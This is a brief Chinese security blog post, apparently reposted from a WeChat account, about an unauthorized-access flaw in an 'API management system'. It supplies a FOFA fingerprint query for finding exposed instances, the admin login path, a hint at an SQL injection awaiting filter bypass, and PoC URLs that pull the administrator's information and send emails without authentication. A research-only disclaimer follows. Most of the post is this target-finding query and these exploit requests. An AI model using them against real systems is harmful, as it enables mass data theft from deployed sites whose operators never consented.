不好意思各位大佬们,因为最近开发项目繁忙,一直没有时间更新公众号,各位大佬见谅,下面分享漏洞
管理系统未授权访问造成 用户信息泄露,导致攻击者进一步利用
FoFa语句:icon_hash="-886587282"
前台页面:
后台页面:/?action=admin&page=login
这里有SQL注入看各位大佬的绕过能力了
未授权POC:
# 未授权获取管理员个人信息/Data/api.php?type=getUserInfo# 未授权发送测试邮件/Data/api.php?type=sendTestEmail&to=<你自己的邮箱地址>
未授权访问tips
原文始发于微信公众号(RongRui安全团队):API管理系统-未授权访问
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论